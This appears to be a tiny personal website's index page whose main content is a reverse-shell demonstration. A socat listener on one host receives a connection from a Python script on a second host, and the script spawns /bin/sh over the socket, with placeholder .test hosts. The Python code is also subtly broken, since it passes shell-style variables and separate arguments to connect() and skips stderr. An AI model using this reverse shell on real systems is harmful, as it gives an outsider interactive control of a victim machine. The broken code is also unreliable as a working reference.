static.soopy.moe

This place holds not a lot of stuff.

list of articles

tim@balls.test$ socat file:`tty`,raw,echo=0 tcp-listen:45721

vic@berry.test$ export RHOST="balls.test"
vic@berry.test$ export RPORT=45721
vic@berry.test$ python shell.py
# shell.py

import sys, socket, os, pty
s = socket.socket()
s.connect($RHOST, $RPORT)
[os.dup2(s.fileno(), fd) for fd in range(0, 2)]
pty.spawn("/bin/sh")
source available on patchy